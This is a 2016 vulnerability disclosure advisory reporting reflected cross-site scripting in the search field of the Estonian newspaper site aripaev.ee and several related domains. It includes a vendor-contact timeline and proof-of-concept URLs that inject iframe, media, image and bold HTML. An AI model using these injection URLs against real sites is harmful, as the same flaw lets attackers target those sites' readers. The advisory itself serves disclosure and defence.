0. Timeline
0.0 Discovery: 2016.01.12
0.1.1 Sent First Report: 2016.01.12
0.1.2 CERT EE ticket #0015941: 2016.01.12
0.2.0 Sent second report as nothing from vendor: 2016.01.19
0.2.1 Vendor reported of the ongoing activities to fixe the issue at 2016.01.21
0.2.2 Vendor reported that it got fixed at 2016.01.25: 2016.01.26
0.2.3 Evaluated the fixes, partial solution, sent findings to vendor: 2016.01.26
0.2.4 Vendor reported that it got fixed at 2016.02.01: 2016.02.01
0.2.5 Evaluated the fixes, partial solution, sent findings to vendor: 2016.02.02
0.3 Disclosure: 2016.03.01

1. Background
aripaev.ee is a wepage for Aripäev. Äripäev one of the most successful economic newspaper in Europe[0].

2. Problem
Sites created by aripaev.ee have XSS[1] on search field.

3. Proof of Concept (PoC) Code
3.1 Main site
http://www.aripaev.ee/search?q=%22%2F%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2F6%2F68%2FLynx_lynx_poing.jpg%2F240px-Lynx_lynx_poing.jpg%3E%3C%2Fiframe%3E&period=2015-01-17Z,2016-01-17Z
or
http://www.aripaev.ee/search?q=%22\%3E%3Caudio%20%20controls%20autoplay%3E%3Csource%20src=%22http://www.rowan.edu/open/philosop/clowney/Aesthetics/AestheticsClasses/class_sessions/session01_intro/Music/Beethoven_5thSymphony.mp3%22%20type=%22audio/mpeg%22%3EYour%20browser%20does%20not%20support%20the%20audio%20tag.%3C/audio%3E
or
http://www.aripaev.ee/search?q=%22\%3E%3Cvideo%20width=%22320%22%20height=%22240%22%20controls%20autoplay%3E%3Csource%20src=%22https://upload.wikimedia.org/wikipedia/en/1/17/Alley_Cat_video_game_theme_song.ogg%22%20type=%22video/ogg%22%3EYour%20browser%20does%20not%20support%20the%20video%20tag.%3C/video%3E
or
http://www.aripaev.ee/search?q=%22/%3E%3Cb%3EBOLD%3C/b%3E
3.2 Subdomains
http://www.bestmarketing.ee/search?q=%22/%3E%3Cimg%20src=%22http://upload.wikimedia.org/wikipedia/commons/thumb/6/68/Lynx_lynx_poing.jpg/240px-Lynx_lynx_poing.jpg%22%3E&period=2015-01-12Z,2016-01-12Z

4. Not an Exhaustive List of Affected Sites
www.aripaev.ee
www.bestmarketing.ee
www.ehitusuudised.ee
www.logistikauudised.ee

5. References
[0] http://firma.aripaev.ee/?id=10631
[1] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

6. Mitigation
Just don't click links with aripaev.ee or any of the subdomains.

APPENDIX - IMAGES
aripaev.ee
aripaev.ee-sub-domains